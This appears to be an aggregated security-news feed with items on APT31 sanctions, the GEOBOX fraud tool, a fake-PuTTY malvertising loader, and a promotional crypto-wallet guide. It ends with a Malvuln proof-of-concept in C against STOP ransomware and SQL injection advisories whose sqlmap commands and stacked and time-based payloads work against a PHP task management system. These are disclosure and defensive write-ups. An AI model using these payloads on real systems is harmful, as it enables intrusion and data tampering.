US and UK officials hit Chinese hacking group APT31 with sanctions and criminal charges after they targeted thousands of businesses, politicians, and critics of China.

For years, China’s state-backed hackers have stolen huge troves of company secrets, political intelligence, and the personal information of millions of people. On Monday, officials in the United States and United Kingdom expanded the long list of hacking allegations, claiming China is responsible for breaching the UK’s elections watchdog and accessing 40 million people’s data. The countries also issued a raft of criminal charges and sanctions against a separate Chinese group following a multiyear hacking rampage.

In August last year, the UK’s Electoral Commission revealed “hostile actors” had infiltrated its systems in August 2021 and could potentially access sensitive data for 14 months until they were booted out in October 2022. The deputy prime minister, Oliver Dowden, told lawmakers on Monday that a China state-backed actor was responsible for the attack. In addition, Dowden said, the UK’s intelligence services have determined that Chinese hacking group APT31 targeted the email accounts of politicians in 2021.

“This is the latest in a clear pattern of malicious cyber activity by Chinese state-affiliated organizations and individuals targeting democratic institutions and parliamentarians in the UK and beyond,” Dowden said in the UK’s House of Commons. The revelations were accompanied by the UK sanctioning two individuals and one company linked to APT31.

Alongside the UK’s announcement on Monday, the US Department of Justice and Department of the Treasury’s Office of Foreign Assets Control unveiled further action against APT31, also known as Violet Typhoon, Bronze Vinewood, and Judgement Panda, including charging seven Chinese nationals with the conspiracy to commit computer intrusions and wire fraud.

The DOJ claims the hacking group, which has been linked back to China’s Ministry of State Security (MSS) spy agency, has spent 14 years targeting thousands of critics, businesses, and political entities around the world in widespread espionage campaigns. This includes posing as journalists to send more than 10,000 malicious emails that tracked recipients, compromising email accounts, cloud storage accounts, telephone call records, home routers, and more. The spouses of one high-ranking White House official and those of multiple US senators were also targeted, the DOJ says.

“These allegations pull back the curtain on China’s vast illegal hacking operation that targeted sensitive data from US elected and government officials, journalists and academics; valuable information from American companies; and political dissidents in America and abroad,” Breon Peace, a US attorney for the Eastern District of New York, said in a statement. “Their sinister scheme victimized thousands of people and entities across the world, and lasted for well over a decade.”

The moves come as countries increasingly warn of an increase in China-linked espionage, during a year when more than 100 countries will host major elections. Statements from officials focus on the impact of the hacking activity on democratic processes, including the targeting of elected officials around the world and the compromising of pro-democracy activists and lawmakers in Hong Kong. However, the disclosures also coincide with continued jostling from Western politicians over pro- or anti-China stances, including the proposed sale of TikTok to a US company, which could result in a ban on the popular app if the sale fails to go through.

As officials in the UK disclosed the details of the hacking activity, Lin Jian, a Chinese foreign ministry spokesperson, claimed it was “disinformation” and told reporters the country “opposes illegal and unilateral” sanctions. “When investigating and determining the nature of cyber cases, one needs to have adequate and objective evidence, instead of smearing other countries when facts do not exist, still less politicize cybersecurity issues,” Jian said in a daily press conference on Monday.

“China is embarking on a huge global campaign of interference and espionage, and the UK and the like-minded nations are pretty sick of it,” says Tim Stevens, a global security lecturer and head of the cybersecurity research group at King’s College London. Stevens says the public shaming and sanctions are unlikely to significantly change China’s actions but may signal a warning to other countries about what is and isn’t deemed acceptable when it comes to international affairs.

China has a broad range of hacking groups linked to its intelligence services and military, as well as companies that it contracts to launch some cyber operations. Many of these groups have been active for more than a decade. Dakota Cary, a China-focused consultant at security firm SentinelOne, says that groups associated with China’s civilian intelligence service are largely conducting diplomatic or government intelligence collection and espionage, while China’s military hackers are behind attacks on power grids and US critical infrastructure such as water supplies. “We do see China engaging in all of those activities simultaneously,” Cary says.

In announcing criminal charges and sanctions against members of APT31, officials in the US laid out a series of hacking allegations that include the targeting of businesses, political entities, and dissidents around the world. These included a “leading provider” of 5G telecoms equipment in the US, Norwegian government officials, and people working in the aerospace and defense industries. APT31 was run by the MSS’s Hubei State Security Department in the city of Wuhan, US officials say.

The seven Chinese nationals hit with charges are Ni Gaobin, Weng Ming, Cheng Feng, Peng Yaowen, Sun Xiaohui, Xiong Wang, and Zhao Guangzong. Both Zhao Guangzong and Ni Gaobin were also sanctioned. The two are alleged to be affiliated with Wuhan XRZ, a company that has also been sanctioned by the US and UK and is believed to be a cover for MSS-linked hacking operations. Employees of the company hacked into a Texas-based energy company in 2018, the US Treasury Department said.

The group used sophisticated malware—including Rawdoor, Trochilus, and EvilOSX—to compromise systems, according to a 27-page indictment unsealed by the DOJ. They also used a “cracked/pirated” version of penetration testing tool Cobalt Strike Beacon to compromise victims, the indictment says. It adds that, between 2010 and November 2023, the group “gained access” to a defense contractor that designed flight simulators for the US Army, Air Force, and Navy; a multi-factor authentication company; an American trade association; a steel company; a machine learning laboratory based in Virginia; and multiple research hospitals.

In its announcement, the UK outlined two separate China-linked incidents: first, the targeting of the email inboxes of 43 members of parliament (MPs) by APT31 in 2021; and second, the hack of the Electoral Commission by further unnamed China-linked hackers. Elections in the UK are decentralized and organized locally, with the commission overseeing the entire process. This setup means the integrity of the electoral process was not impacted, the commission says; however, a huge amount of data may have been taken by the hackers.

When the Electoral Commission revealed it had been compromised last year, it said the details of around 40 million people may have been accessed. The commission said names and addresses of people in Great Britain who were registered to vote between 2014 and 2022 could have been compromised, and that file-sharing and email systems could have been made accessible. “It’s really remarkable that China would go after election oversight systems, particularly given the diplomacy that the PRC \[People’s Republic of China\] is trying to pull off with the EU,” Cary says. “It’s a very significant act for the PRC to go after these types of systems,” Cary says. “It’s something that democracies are really sensitive to.”

While nations have called out China’s hacking activities for years, the country has evolved its tactics and techniques to become harder to detect. “Over the past couple of years, tired of having their operations rumbled and publicly outed, the Chinese have placed a growing emphasis on stealthy tradecraft in cyber espionage attacks,” Don Smith, vice president of threat intelligence at security firm Secureworks’ counter-threat unit, said in a statement. “This is a change in MO from its previous ‘smash and grab’ reputation but it is viewed by the Chinese as a necessary evolution to one, make it harder to get caught and two, make it nearly impossible to attribute an attack to them.”

Chinese Hackers Charged in Decade-Long Global Spying Rampage

This week on the Lock and Code podcast, we speak with Carey Parker about the importance and the process of securing your home network.

_This week on the Lock and Code podcast…_

Few words apply as broadly to the public—yet mean as little—as “home network security.”

For many, a “home network” is an amorphous thing. It exists somewhere between a router, a modem, an outlet, and whatever cable it is that plugs into the wall. But the idea of a “home network” doesn’t need to intimidate, and securing that home network could be simpler than many folks realize.

For starters, a home network can be simply understood as a router—which is the device that provides access to the internet in a home—and the other devices that connect _to_ that router. That includes obvious devices like phones, laptops, and tablets, and it includes “Internet of Things” devices, like a Ring doorbell, a Nest thermostat, and any Amazon Echo device that come pre-packaged with the company’s voice assistant, Alexa. There are also myriad “smart” devices to consider: smartwatches, smart speakers, smart light bulbs, don’t forget the smart fridges.

If it sounds like we’re describing a home network as nothing more than a “list,” that’s because a home network is pretty much just a list. But where securing that list becomes complicated is in all the updates, hardware issues, settings changes, and even scandals that relate to every single device on that list.

Routers, for instance, provide their own security, but over many years, they can lose the support of their manufacturers. IoT devices, depending on the brand, can be made from cheap parts with little concern for user security or privacy. And some devices have scandals plaguing their past—smart doorbells have been hacked and fitness trackers have revealed running routes to the public online.

This shouldn’t be cause for fear. Instead, it should help prove why home network security is so important.

Today, on the Lock and Code podcast with host David Ruiz, we’re speaking with cybersecurity and privacy advocate Carey Parker about securing your home network.

Author of the book Firewalls Don’t Stop Dragons and host to the podcast of the same name, Parker chronicled the typical home network security journey last year and distilled the long process into four simple categories: Scan, simplify, assess, remediate.

In joining the Lock and Code podcast yet again, Parker explains how everyone can begin their home network security path—where to start, what to prioritize, and the risks of putting this work off, while also emphasizing the importance of every home’s router:

> Your router is kind of the threshold that protects all the devices inside your house. But, like a vampire, once you invite the vampire across the threshold, all the things inside the house are now up for grabs.
> 
> Carey Parker

Tune in today to listen to the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 Securing your home network is long, tiresome, and entirely worth it, with Carey Parker: Lock and Code S05E07 

By Deeba Ahmed
New Dark Web Tool GEOBOX, sold for $700 on Telegram and underground forums, hijacks Raspberry Pi, allowing cybercriminals to fake locations and evade detection.
This is a post from HackRead.com Read the original post: New GEOBOX Tool Hijacks Raspberry Pi, Lets Hackers Fake Location

Cybercriminals now repurpose devices like Raspberry Pi into ‘plug-and-play’ weapons for digital fraud. With GEOBOX on the Dark Web, their capabilities are even more sophisticated, enabling manipulation of GPS, network simulation, Wi-Fi mimicry, and anti-fraud filter evasion.

Cybercriminals are targeting IoT devices for illicit activities through OPSEC techniques and customizable settings, allowing these devices to operate without logs and ensure anonymity for perpetrators, reveals research from the US-based cybersecurity solutions and services provider, Resecurity. 

According to Resecurity’s Cyber Threat Intelligence team, a significant discovery has been made on the Dark Web: a malicious tool known as GEOBOX. This tool can turn ordinary IoT hardware into powerful weapons for cybercriminals. GEOBOX represents a “paradigm shift in cybercriminal tactics,” highlighting the evolving nature of threats in the digital landscape.

GEOBOX is being sold on Telegram (Screenshot credit: Resecurity)

GEOBOX is a powerful, deceptive tool specifically designed for the Raspberry Pi 4 Model B devices to facilitate cybercriminals in anonymization and fraud. It was first discovered while investigating an online banking theft involving a high-net-worth (HNW) client of a Fortune 100 financial company, prompting researchers to dig deeper into its workings.

The emergence of GEOBOX is not unexpected, appearing shortly after the discovery of another dark web tool known as TMChecker. TMChecker has been arming ransomware gangs, specifically targeting the e-commerce and aviation industries with precision cyberattacks.

The research blog, shared by Resecurity with Hackread.com, ahead of publication on Monday revealed that threat actors have already used multiple internet-connected GEOBOX devices as proxies, each placed at a strategic remote location, enhancing their anonymity.

This complicated the investigation and tracking process, as GEOBOX devices do not store logs by default. Resecurity observed a bad actor using GEOBOX with two LTE-based wireless modems for enhanced anonymization, particularly in remote connections.

The package can be rented for a lifetime fee of $700 or a monthly rate of $80, payable in cryptocurrency and advertised on major underground forums and Telegram. The user manual provides clear instructions on the download and installation of the Raspberry Pi OS using Raspberry Pi Imager, how to obtain the GEOBOX Software Image and work with the GEOBOX software.

It is a feature-rich tool, including WebRTC IP for discreet online communication, GPS spoofing for geolocation manipulation, and the ability to mask Wi-Fi MAC addresses. The device requires at least 4 GB of RAM, but an 8 GB version is also available offering superior performance. 

Further, it connects to the internet via Ethernet or USB modem and offers various tabs like INTERNETBOX, MIDDLEBOX, Proxy, VPN, and Wi-Fi, each providing specific functionalities. Users can configure various internet connection types, including VPN protocols like L2TP, PPTP, L2TP-IPsec, Wireguard, SSTP, Zerotier, and OpenVPN, and even create a VPN tunnel within another VPN tunnel. 

GEOBOX can help threat actors in cyberattack coordination, dark web market operations, sophisticated financial frauds, circumvention of government censorship, anonymous malware distribution, credential stuffing campaigns, disinformation campaigns, surveillance evasion in authoritarian regimes, content piracy and geo-restriction bypassing, and network security testing.

That’s not all. Cybercriminals can also use GEOBOX to fake their geographical location using a GPS-like driver, bypassing location verification checks on websites like Whoer.net and browserleaks.com, and creating customized accounts on popular platforms like Google and Amazon.

The emergence of GEOBOX necessitates robust digital risk monitoring and endpoint protection strategies, making collaboration between law enforcement agencies, deployment of proactive measures, and continuous innovation in cybersecurity strategies fundamental to counter such threats effectively.

1.  Kaspersky’s iShutdown Tool Detects Pegasus Spyware
2.  New Dark Web Market Styx: Focuses on Money Laundering
3.  USB Wormable Raspberry Robin Malware Hits Windows PCs
4.  Building Your Defense Toolbox: Tools to Combat Cyber Threats
5.  Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime

New GEOBOX Tool Hijacks Raspberry Pi, Lets Hackers Fake Location

By Owais Sultan
Entering the dynamic world of cryptocurrencies is pretty exciting. But one can easily get overwhelmed with the amount…
This is a post from HackRead.com Read the original post: Step-by-Step Guide to Creating Your First Crypto Wallet

Entering the dynamic world of cryptocurrencies is pretty exciting. But one can easily get overwhelmed with the amount of information that floods you once you dip your toes. 

Since you’re looking to create a crypto wallet, this guide was designed to help you as a newbie complete this process without a hassle. It will highlight the distinction between custodial and non-custodial wallets, emphasizing the benefits of each, and walk you through the setup process. 

****Two Types of Crypto Wallets****

There are two main types of wallets: custodial and non-custodial. Understanding the difference between these two is detrimental to making the right decision. 

****Custodial Wallets****

Custodial wallets are managed by a third-party entity, such as a cryptocurrency exchange or a specialized wallet service. When you use a custodial wallet, the private keys to your cryptocurrencies are held by the service provider.

****Advantages:****

*   Custodial wallets often offer a user-friendly interface, making them accessible to beginners. 
*   Users don’t need to worry about managing their private keys, as the service provider takes care of security.
*   If you forget your password or lose access to your account, you can recover your funds through the service provider’s customer support.

****Disadvantages:****

*   By entrusting your private keys to a third party, you’re exposed to the risk of the service being hacked. 
*   Since the service provider controls the wallet’s private keys, they have the ultimate authority over your funds. This control includes the ability to freeze accounts or delay transactions, which might be concerning for some users.

****Non-Custodial Wallets: Security and Autonomy****

Non-custodial wallets give you full control over your cryptocurrency by allowing you to manage your wallet’s private keys. This means that only you have access to your funds and the authority to make transactions.

****Advantages:****

*   Since you’re the sole holder of the private keys, the risk of external breaches is significantly reduced. 
*   You have complete autonomy over your funds, without any intermediary having the power to freeze or manage your assets. 

****Disadvantages:****

*   Managing your private keys means you must be vigilant in securing them. Losing your keys without a backup can result in the irreversible loss of your assets.
*   Non-custodial wallets can be more complex to use, especially for those new to cryptocurrency. 

Your choice between a custodial and non-custodial wallet will depend on what you value more: convenience or control. For those who prioritize ease of use and are just getting their feet wet in the crypto world, a custodial solution might be the way to go.

On the other hand, if you’re keen on having full control over your assets, a non-custodial wallet is your best bet. But then you must learn how to safely store and manage your keys, which might be tough for a beginner.

****Setting Up Your Wallet****

Regardless of the type of wallet you choose, the setup process is generally straightforward. Here’s how you can get started:

****Research****

Look for a reputable wallet provider. For non-custodial options, consider security features and compatibility with different cryptocurrencies. For custodial wallets, assess the platform’s reliability and customer service.

****Download and Install****

Once you’ve chosen your provider, download the wallet application on your smartphone or computer. Follow the installation instructions.

****Create Your Wallet****

Open the application and select the option to create a new wallet. You’ll likely be prompted to set up a password or PIN for additional security.

****Backup Your Wallet****

If you’re using a non-custodial wallet, you’ll be given a recovery phrase. It’s crucial to write this down and store it in a safe place. This phrase is your lifeline if you ever lose access to your device.

****Deposit Cryptocurrency****

You can now transfer crypto into your new wallet. You can do this by purchasing cryptocurrency through an exchange and sending it to your wallet’s address or receiving it from someone else.

****Introducing Nonbank: The Best of Both Worlds****

Now, let’s talk about Nonbank (PDF). It’s a new player but their concept is intriguing. Nonbank offers the convenience of a custodial wallet with the security and control of a non-custodial option. The upcoming Tron Wallet feature is especially noteworthy for those interested in managing both digital and traditional financial assets seamlessly. 

Setting up a wallet with Nonbank is a breeze. Their user interface is intuitive, making it easy for beginners to navigate. With Nonbank, you’re not just getting a wallet; you’re getting a comprehensive platform that supports your journey through the crypto space.

****To Sum Up****

Choosing the right wallet is a critical step for anyone venturing into the cryptocurrency world. Whether opting for a custodial or non-custodial wallet, the primary considerations should be convenience, security, and control. Nonbank can be a great tool to simplify the management of your digital and traditional assets, which makes it an excellent choice for you as a newcomer. 

1.  5 Types of Crypto You Didn’t Know Existed
2.  The Future of MATIC and What to Expect in 2024
3.  Navigating the new frontier of cryptocurrency futures
4.  What the Bitcoin ETF Approval Mean for the Crypto Market
5.  Enhancing Blockchain Randomness To Eliminate Trust Issues
6.  Exploring the Phenomenal Rise of Ethereum as a Digital Asset

Step-by-Step Guide to Creating Your First Crypto Wallet

German authorities have announced the takedown of an illicit underground marketplace called Nemesis Market that peddled narcotics, stolen data, and various cybercrime services.
The Federal Criminal Police Office (aka Bundeskriminalamt or BKA) said it seized the digital infrastructure associated with the darknet service located in Germany and Lithuania and confiscated €94,000 ($102,107)

German Police Seize 'Nemesis Market' in Major International Darknet Raid

A malicious ad for the popular admin tool PuTTY leads victims to a fake site that downloads malware.

Malware loaders (also known as droppers or downloaders) are a popular commodity in the criminal underground. Their primary function is to successfully compromise a machine and deploy one or multiple additional payloads.

A good loader avoids detection and identifies victims as legitimate (i.e. not sandboxes) before pushing other malware. This part is quite critical as the value of a loader is directly tied to the satisfaction of its “customers”.

In this blog post, we describe a malvertising campaign with a loader that was new to us. The program is written in the Go language and uses an interesting technique to deploy its follow-up payload, the Rhadamanthys stealer.

PuTTY is a very popular SSH and Telnet client for Windows that has been used by IT admins for years. The threat actor bought an ad that claims to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.

In this example, the ad looks suspicious simply because the ad snippet shows a domain name (_arnaudpairoto\[.\]com_) that is completely unrelated. This is not always the case, and we continue to see many malicious ads that exactly match the impersonated brand.

**Fake PuTTY site**

The ad URL points to the attacker controlled domain where they can easily defeat security checks by showing a “legitimate” page to visitors that are not real victims. For example, a crawler, sandbox or scanner, will see this half finished blog:

Real victims coming from the US will be redirected to a fake site instead that looks and feels exactly like putty.org. One of the big differences though is the download link.

The malicious payload is downloaded via a 2 step redirection chain which is something we don’t always see.

puttyconnect\[.\]info/1.php  
HTTP/1.1 302 Found  
Location: astrosphere\[.\]world/onserver3.php

astrosphere\[.\]world/onserver3.php  
HTTP/1.1 200 OK  
Server: nginx/1.24.0  
Content-Type: application/octet-stream  
Content-Length: 13198274  
Connection: keep-alive  
Content-Description: File Transfer  
Content-Disposition: attachment; filename="PuTTy.exe"

We believe the astrosphere\[.\]world server is performing some checks for proxies while also logging the victim’s IP address. This IP address will later be checked before downloading the secondary payload.

That PuTTy.exe is malware, a dropper written in the Go language (version 1.21.0).

Its author may have given it the name “_Dropper 1.3_“:

**Follow-up payload**

Upon executing the dropper, there is an IP check for the victim’s public IP address. This is likely done to only continue with users that have gone through the malicious ad and downloaded the malware from the fake site.

zodiacrealm\[.\]info/api.php?action=check\_ip&ip=\[IP Address\]

If a match is found, the dropper proceeds to retrieve a follow-up payload from another server (192.121.16\[.\]228:22) as seen in the image below:

To get this data, we see it uses the SSHv2 (Secure Shell 2.0) protocol implemented via OpenSSH on a Ubuntu server. We can only think of using this protocol to make the malware download more covert.

That payload is Rhadamanthys which is executed by the parent process PuTTy.exe:

**Malvertising / loader combo**

We have seen different types of loaders via malvertising campaigns, including FakeBat which we profiled recently. Given how closely the loader is tied to the malvertising infrastructure it is quite likely that the same threat actor is controlling both. The service they offer to other criminals is one of malware delivery where they take care of the entire deployment process, from ad to loader to final payload.

We reported this campaign to Google. Malwarebytes and ThreatDown users are protected as we detect the fake PuTTY installer as _Trojan.Script.GO_.

ThreatDown users that have DNS Filtering can enable ad blocking in their console to prevent attacks that originate from malicious ads.

**Indicators of Compromise**

Decoy ad domain

arnaudpairoto\[.\]com

Fake site

puttyconnect\[.\]info

PuTTY

astrosphere\[.\]world
0caa772186814dbf84856293f102c7538980bcd31b70c1836be236e9fa05c48d

IP check

zodiacrealm\[.\]info

Rhadamanthys

192.121.16\[.\]228:22
bea1d58d168b267c27b1028b47bd6ad19e249630abb7c03cfffede8568749203

 New Go loader pushes Rhadamanthys stealer 

Win32.STOP.Ransomware (smokeloader) malware suffers from both local and remote code execution vulnerabilities. The remote code execution can be achieved by leveraging a man-in-the-middle attack.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/3b9e9e130d52fe95c8be82aa4b8feb74.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Win32.STOP.Ransomware (smokeloader)Vulnerability: Remote Code Execution (MITM)Family: StopType: PE32MD5 3b9e9e130d52fe95c8be82aa4b8feb74Vuln ID: MVID-2024-0676Disclosure: 03/22/2024Description:There are two roads to exploitation for this particular ransomware, network "man-in-the-middle" or localized code execution, this advisory explores the network route.Stop ransomware makes several HTTP GET requests over an insecure protocol TCP port 80 to download secondary PE files "build2.exe" and "build3.exe"Moreover, no integrity checks are made on these files, well positioned third-party attackers who can intercept traffic can send back arbitrary exploit PE files.[Domains contacted]api.2ip.uasajdfue.comsdfjhuz.com[URLs]/test2/get.php?pid=A41BF90C9233CFB5AAFE279642C3793D&first=true/dl/build2.exe/files/1/build3.exeStop ransomware actions.1) Creates two directories under AppData\Local, named with unique ID e.g. "2197cd80-6ccb-4fe1-97c0-57d05945fac6"2) Sets deny permissions on the directory for everyone Everyone (OI)(CI)(DENY)(D,DC)3) Creates Windows registry Run key "SysHelper" for persistence, that points to a directory in AppData\Local     e.g. \Users\Victim\AppData\Local\407868e1-6d5a-44f2-81ba-a8fedd9ea8db\StopCrypt.exe4) Copies downloaded malware to a second created directory under AppData\LocalExploit PE file executes as a child of the parent process malware and does following on our behalf.1) Kill the parent process leveraging WIN32 API     GetCurrentProcessId()     Get parent process ID using CreateToolhelp32Snapshot()     Call OpenProcess(PROCESS_TERMINATE, FALSE,  ppid)2) Delete registry persistence Run key "SysHelper" 3) Modify permissions on Stops backup directory to full access for everyone user group "/grant Everyone (OI)(CI)F" 4) Deletes the malware backup directory under AppData\Local[PoC/Video URL]https://www.youtube.com/watch?v=S6E62YIOczo[Sample]https://bazaar.abuse.ch/sample/caeecccfee0962fbe3d4fb4ab336bf3d1230b12ad0821ff66f7a2cabc289c954/By the way, "urlmon.dll" DLL file exported by "RansomLord v2" can be used against this sample for local exploitation.Download: https://github.com/malvuln/RansomLordAll tests conducted successfully in a virtual machine environment using DNS and traffic redirection techniques.Network Exploit/PoC1) Compile the below "StopExploit.c" code as "build2.exe" and "build3.exe"2) Create directory "dl" and save build2.exe here3) Create directories "files/1" and save build3.exe here      Note, In my tests exploitation worked with just the "build2.exe" saved in the "dl" directory.4) Start web server on TCP port 80      python -m http.server 805) Intercept the Stop Ransomware traffic and DNS to server we control, send back exploit files."StopExploit.c" #include "windows.h"#include "stdio.h"#include "tlhelp32.h"#include "psapi.h"#define BUFFER 512//[+] Win32 STOP (smokeloader) Ransomware//[+] MD5 3b9e9e130d52fe95c8be82aa4b8feb74//[+] Remote Code Execution PoC//[+] By John Page (aka hyp3rlinx) - malvuln//[+] ApparitionSec//[+] March 19, 2024 //=========================================================================//Abuses MITM insecure download over TCP port 80 to serve exploits to kill "Win32.Stop" malware//Deletes persistence Run key "SysHelper" and secondary malware backup directory//Tested successfully in Virtual Machine environment using DNS and network traffic redirection.//=========================================================================////linker -lpsapi (Dev-C++) x32////=========================================================================/** DISCLAIMERAuthor is NOT responsible for any damages whatsoever by using this software or improper malwarehandling. By using this code you assume and accept all risk implied or otherwise.**///=========================================================================DWORD getParentPID(DWORD pid);void Kill_StopCrypt();void DelSysHelper();void EvictBackupMalware(char *maldir);int main(void){    Sleep(3000);    DelSysHelper();    return 666;}void Kill_StopCrypt(){        DWORD pid, ppid;        pid = GetCurrentProcessId();        ppid = getParentPID(pid);        HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE,  ppid);      if (NULL != handle){        DelSysHelper();        TerminateProcess(handle, 0);        CloseHandle(handle);     }}void DelSysHelper(){  char value[BUFFER];  DWORD BufferSize = sizeof value;  LONG rc = RegGetValueA(HKEY_CURRENT_USER, (LPCSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (LPCSTR)"SysHelper", RRF_RT_ANY, NULL, (PVOID)&value, &BufferSize);  if(rc == ERROR_SUCCESS){     rc = RegDeleteKey(HKEY_CURRENT_USER, (LPTSTR)"Software\\Microsoft\\Windows\\CurrentVersion\\Run");      if(rc == ERROR_SUCCESS){         Kill_StopCrypt();      }      EvictBackupMalware(value);   } }DWORD getParentPID(DWORD pid){    HANDLE h = NULL;    PROCESSENTRY32 pe={0};    DWORD ppid = 0;    pe.dwSize = sizeof(PROCESSENTRY32);    h = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);    if(Process32First(h, &pe)){        do {          if (pe.th32ProcessID==pid){            ppid = pe.th32ParentProcessID;            break;         }        } while(Process32Next(h, &pe));    }    CloseHandle(h);    return (ppid);}char* concat(const char *s1, const char *s2){   char *result = malloc(strlen(s1) + strlen(s2) + 1);   strcpy(result, s1);   strcat(result, s2);   return result;}void EvictBackupMalware(char *maldir){  char *infected_dir_path;  int j = 0;  int cnt = 0;   int i;  char array[255][255];  for (i=0; i <= (strlen(maldir)); i++){    if (maldir[i] == '\\' || maldir[i]=='\0'){        array[cnt][j]='\0';        cnt++;        j=0;     }else{      array[cnt][j]=maldir[i];      j++;        }   }    char result[256]="C:\\Users\\";    char *r1;    char *r2;    for (i = 0; i < cnt; i++) {        //printf(" %s %d\n", array[i],i);        r1 = concat(result, array[2]);        r2 = concat(r1, "\\AppData\\Local\\");        //reg run key path points to this infected directory        infected_dir_path = concat(r2, array[5]);    }    //printf("target: %s", infected_dir_path);    char perm[256]="icacls ";    char *r3;    char *perm_cmd;    r3 = concat(perm, infected_dir_path);    //reset permissions on dir created by Stop ransomware    perm_cmd = concat(r3, " /grant Everyone:(OI)(CI)F");    system(perm_cmd);    //evict backed up malware and dir    char del_cmd[256]="RD ";    char *force_del = concat(del_cmd, infected_dir_path);    char *bye_bye_douche = concat(force_del, " /S /Q");    system(bye_bye_douche);}//malvuln circa 2024Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Win32.STOP.Ransomware (Smokeloader) MVID-2024-0676 Remote Code Execution

Task Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

# Exploit Title: SourceCodester PHP Task Management System 1.0 (update-employee.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29302  
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(taskmatic/update-employee.php):

$admin_id = $_GET['admin_id'];  
if(isset($_POST['update_current_employee'])){  
    $obj_admin->update_user_data($_POST,$admin_id);  
}  
if(isset($_POST['btn_user_password'])){  
    $obj_admin->update_user_password($_POST,$admin_id);  
}  
$sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' ";  
$info = $obj_admin->manage_all_info($sql);  
$row = $info->fetch(PDO::FETCH_ASSOC);

-> sqlmap -u "http://localhost/taskmatic/taskmatic/update-employee.php?admin_id=1" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs  
---  
Parameter: admin_id (GET)  
    Type: stacked queries  
    Title: MySQL >= 5.0.12 stacked queries (comment)  
    Payload: admin_id=1';SELECT SLEEP(5)#

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: admin_id=1' AND (SELECT 3843 FROM (SELECT(SLEEP(5)))GLKx)-- mLKZ  
---

# Exploit Title: SourceCodester PHP Task Management System 1.0 (admin-manage-user.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29303  
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(taskmatic/admin-manage-user.php):

if(isset($_GET['delete_user'])){  
  $action_id = $_GET['admin_id'];

  $task_sql = "DELETE FROM task_info WHERE t_user_id = $action_id";  
  $delete_task = $obj_admin->db->prepare($task_sql);  
  $delete_task->execute();

  $attendance_sql = "DELETE FROM attendance_info WHERE atn_user_id = $action_id";  
  $delete_attendance = $obj_admin->db->prepare($attendance_sql);  
  $delete_attendance->execute();

    $sql = "DELETE FROM tbl_admin WHERE user_id = :id";  
  $sent_po = "admin-manage-user.php";  
  $obj_admin->delete_data_by_this_method($sql,$action_id,$sent_po);  
}

-> sqlmap -u "http://localhost/taskmatic/taskmatic/admin-manage-user.php?delete_user=delete_user&admin_id=28" --cookie="Cookie: PHPSESSID=plhvl5e53hbuvq9stj21mesirj" --batch --dbs  
---  
Parameter: admin_id (GET)  
    Type: stacked queries  
    Title: MySQL >= 5.0.12 stacked queries (comment)  
    Payload: delete_user=delete_user&admin_id=28;SELECT SLEEP(5)#

    Type: time-based blind  
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
    Payload: delete_user=delete_user&admin_id=28 AND (SELECT 9863 FROM (SELECT(SLEEP(5)))wYJM)  
---

# Exploit Title: SourceCodester PHP Task Management System 1.0 (update-admin.php) - SQL Injection  
# Date: 22 March 2024  
# Exploit Author: Gnanaraj Mauviel (@0xm3m)  
# Vendor Homepage: https://www.sourcecodester.com/php/17217/employee-management-system-php-and-mysql-free-download.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/taskmatic.zip  
# Version: v1.0  
# CVE: CVE-2024-29301  
# Tested on: Mac OSX, XAMPP, Apache, MySQL

-------------------------------------------------------------------------------------------------------------------------------------------

Source Code(taskmatic/update-admin.php):

$admin_id = $_GET['admin_id'];  
if(isset($_POST['update_current_employee'])){  
    $obj_admin->update_admin_data($_POST,$admin_id);  
}  
if(isset($_POST['btn_user_password'])){  
    $obj_admin->update_user_password($_POST,$admin_id);  
}  
$sql = "SELECT * FROM tbl_admin WHERE user_id='$admin_id' ";  
$info = $obj_admin->manage_all_info($sql);  
$row = $info->fetch(PDO::FETCH_ASSOC);

